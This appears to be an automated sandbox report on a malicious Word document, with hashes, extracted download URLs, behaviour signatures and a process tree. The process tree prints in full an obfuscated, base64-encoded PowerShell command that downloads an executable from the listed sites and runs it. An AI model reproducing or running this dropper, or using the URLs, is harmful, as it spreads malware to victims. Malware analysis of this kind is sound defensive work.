Analysis
-
max time kernel
101s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
11/08/2024, 17:42
Static task
static1
Behavioral task
behavioral1
Sample
8b561633eae816d387eb741a09b1cf3f_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
8b561633eae816d387eb741a09b1cf3f_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
8b561633eae816d387eb741a09b1cf3f_JaffaCakes118.doc
-
Size
171KB
-
MD5
8b561633eae816d387eb741a09b1cf3f
-
SHA1
8d4e5e1e8828c18bb4b4f855a0e538a49532d14b
-
SHA256
8b086b781acec12715982f30c39eb5d20950325e39a5d84b33a6df96d9edcf8c
-
SHA512
73166cc229f9e3e20dbe17caa45ddfb8a23355826e85205bdc14fae5df56b9b2753c017885c1532e1da8d688a53534029c8f616f28ff6ac7b6344f7ab95237e6
-
SSDEEP
1536:sB445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ5Z+a93WvrCv3Pt6DVn:s22TWTogk079THcpOu5UZ8vw3Pt6DVn
Malware Config
Extracted
http://ckinterbiz.com/backup/waI0rNy/
http://creationskateboards.com/shred/xnYp2/
http://bnmintl.com/cgi-bin/hQuB2/
http://buildingrobots.net/cgi-bin/LKgv/
http://booksearch.com/index_files/U/
http://davehale.ca/cgi-bin/v4kax/
https://www.equiposjj.com/cgi-bin/h0MId/
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2596 POWeRsHeLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POWeRsHeLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\TypeLib WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\TypeLib\{28DFD206-5FDB-4757-BA88-CD47304056E0}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{28DFD206-5FDB-4757-BA88-CD47304056E0}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{28DFD206-5FDB-4757-BA88-CD47304056E0}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\TypeLib\{28DFD206-5FDB-4757-BA88-CD47304056E0}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\TypeLib\{28DFD206-5FDB-4757-BA88-CD47304056E0}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1820 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2596 POWeRsHeLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2596 POWeRsHeLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1820 WINWORD.EXE 1820 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1820 wrote to memory of 3040 1820 WINWORD.EXE 33 PID 1820 wrote to memory of 3040 1820 WINWORD.EXE 33 PID 1820 wrote to memory of 3040 1820 WINWORD.EXE 33 PID 1820 wrote to memory of 3040 1820 WINWORD.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8b561633eae816d387eb741a09b1cf3f_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exePOWeRsHeLL -ENCOD JABPAHEAaQBkADEAbgB1AD0AKAAoACcAQQA3AHgAJwArACcAdAAnACkAKwAoACcAYgBpACcAKwAnAG0AJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABlAG4AVgA6AFUAcwBFAHIAUAByAG8ARgBJAGwAZQBcAHoAdwBMADYATQBVAEkAXABvAFYAQwBkAEIAeABzAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAEUAYwBUAE8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABDAGAAVQByAGkAYABUAFkAcAByAE8AVABvAEMATwBsACIAIAA9ACAAKAAoACcAdAAnACsAJwBsAHMAMQAyACcAKwAnACwAJwApACsAJwAgACcAKwAnAHQAbAAnACsAJwBzACcAKwAnADEAJwArACgAJwAxACwAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQASQAwADAAMgAwADUAbAAgAD0AIAAoACgAJwBBAGkAJwArACcAcAA0ACcAKQArACgAJwBjAGIAJwArACcANwBwACcAKQApADsAJABUADAANQBqAHYAawB6AD0AKAAnAEsAJwArACgAJwBnAHQAdgAnACsAJwBoAGcAJwApACsAJwB4ACcAKQA7ACQAWgB5ADQAcwBvAGwAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnADQAMwBMACcAKwAnAFoAdwBsACcAKQArACcANgBtACcAKwAoACcAdQBpADQAMwAnACsAJwBMACcAKwAnAE8AJwArACcAdgBjAGQAYgB4AHMAJwArACcANAAzACcAKQArACcATAAnACkALgAiAHIAZQBgAHAAbABgAEEAYwBlACIAKAAoAFsAYwBIAEEAcgBdADUAMgArAFsAYwBIAEEAcgBdADUAMQArAFsAYwBIAEEAcgBdADcANgApACwAJwBcACcAKQApACsAJABJADAAMAAyADAANQBsACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABFADUAcQA5AHoAXwBsAD0AKAAnAE4AJwArACgAJwBjACcAKwAnADUAaAAnACkAKwAoACcAMQAnACsAJwByAHQAJwApACkAOwAkAFgAcgB4AGgAMwB0ADcAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBFAGIAQwBsAEkAZQBOAHQAOwAkAEwAegBoADkAcwBhAF8APQAoACcAaAB0ACcAKwAoACcAdABwACcAKwAnADoAJwApACsAJwAvAC8AJwArACcAYwAnACsAKAAnAGsAaQAnACsAJwBuACcAKwAnAHQAZQByAGIAaQB6ACcAKQArACcALgBjACcAKwAoACcAbwAnACsAJwBtAC8AJwApACsAJwBiACcAKwAoACcAYQBjAGsAdQBwACcAKwAnAC8AJwArACcAdwAnACkAKwAnAGEASQAnACsAJwAwACcAKwAoACcAcgAnACsAJwBOAHkALwAnACkAKwAoACcAKgBoACcAKwAnAHQAJwApACsAJwB0AHAAJwArACgAJwA6AC8ALwBjAHIAZQAnACsAJwBhAHQAJwApACsAJwBpACcAKwAoACcAbwBuACcAKwAnAHMAJwApACsAKAAnAGsAYQAnACsAJwB0AGUAYgAnACkAKwAoACcAbwAnACsAJwBhAHIAZAAnACkAKwAnAHMAJwArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AcwAnACkAKwAnAGgAJwArACcAcgAnACsAKAAnAGUAZAAvACcAKwAnAHgAbgBZACcAKQArACcAcAAnACsAKAAnADIALwAnACsAJwAqACcAKQArACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwArACcAOgAvACcAKwAnAC8AYgAnACsAJwBuACcAKwAoACcAbQBpACcAKwAnAG4AJwApACsAKAAnAHQAbAAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAKAAnAGMAZwAnACsAJwBpAC0AYgAnACkAKwAoACcAaQBuAC8AaAAnACsAJwBRACcAKQArACgAJwB1AEIAJwArACcAMgAvACcAKQArACcAKgAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAnACkAKwAoACcALwBiAHUAaQAnACsAJwBsAGQAaQAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHIAbwBiAG8AdAAnACsAJwBzAC4AbgAnACkAKwAoACcAZQAnACsAJwB0AC8AYwBnACcAKQArACgAJwBpACcAKwAnAC0AYgAnACkAKwAnAGkAJwArACgAJwBuAC8AJwArACcATABLACcAKQArACgAJwBnACcAKwAnAHYALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwADoAJwApACsAJwAvAC8AJwArACgAJwBiAG8AbwAnACsAJwBrACcAKQArACgAJwBzAGUAJwArACcAYQAnACkAKwAoACcAcgBjACcAKwAnAGgALgBjACcAKwAnAG8AbQAnACsAJwAvAGkAbgBkAGUAJwArACcAeABfAGYAJwApACsAKAAnAGkAJwArACcAbABlAHMALwAnACkAKwAnAFUAJwArACgAJwAvACoAJwArACcAaAB0AHQAcAA6AC8ALwAnACsAJwBkACcAKQArACgAJwBhAHYAZQAnACsAJwBoACcAKQArACcAYQBsACcAKwAoACcAZQAuACcAKwAnAGMAJwApACsAKAAnAGEALwBjAGcAaQAtACcAKwAnAGIAaQBuAC8AdgAnACsAJwA0ACcAKwAnAGsAYQB4AC8AJwArACcAKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcABzADoALwAvACcAKwAnAHcAdwB3ACcAKwAnAC4AJwArACcAZQAnACkAKwAoACcAcQB1AGkAJwArACcAcABvAHMAJwArACcAagBqAC4AYwBvAG0AJwApACsAJwAvAGMAJwArACgAJwBnACcAKwAnAGkALQBiAGkAbgAvAGgAJwArACcAMABNACcAKQArACgAJwBJAGQAJwArACcALwAnACkAKQAuACIAcwBQAGwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABWAHoAMABvADIANwBwAD0AKAAnAFkAYwAnACsAKAAnAHgAYgA1ACcAKwAnADAANQAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEoAbABlAHAAcABvADcAIABpAG4AIAAkAEwAegBoADkAcwBhAF8AKQB7AHQAcgB5AHsAJABYAHIAeABoADMAdAA3AC4AIgBEAG8AYABXAG4AbABPAEEARABgAEYASQBgAGwARQAiACgAJABKAGwAZQBwAHAAbwA3ACwAIAAkAFoAeQA0AHMAbwBsAHkAKQA7ACQAVQAzADcAaABwAHIAMQA9ACgAJwBRACcAKwAnAHUAJwArACgAJwAyAHMAJwArACcAcQByADIAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAWgB5ADQAcwBvAGwAeQApAC4AIgBMAEUAbgBgAEcAVABIACIAIAAtAGcAZQAgADMAOQAwADgAOQApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABaAHkANABzAG8AbAB5ACkAOwAkAFoAMwB0AGkAaQBrAGwAPQAoACcAVwAnACsAKAAnAF8AeAAnACsAJwBtAGsAcQB1ACcAKQApADsAYgByAGUAYQBrADsAJABVAHAAMAB2AGwAZgBtAD0AKAAoACcARQAnACsAJwAyAGgAZgA5ACcAKQArACcAZgByACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBvADYAZwBsADQAdQA9ACgAJwBPACcAKwAoACcANQAnACsAJwB2AHMAJwApACsAKAAnAGQAJwArACcAcABuACcAKQApAA==1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD529797f61949671fb165e72dbe8c6233f
SHA149b6a7d73cbc0c66473e1ca79e9a196dfe3eb6d5
SHA256b681c7de745c149c530ddbcb6099a6159c307adc807bd7a6ce8e1a15cf6ec827
SHA5124a04c1eb44aaae1bf2d09e754a1ec97a29ad5dc778f5b65a735cd9300a12b219bcd3afc330b5d4fe54bda68d693f9383a84f8a6c494de2c76a1b08e30cffe411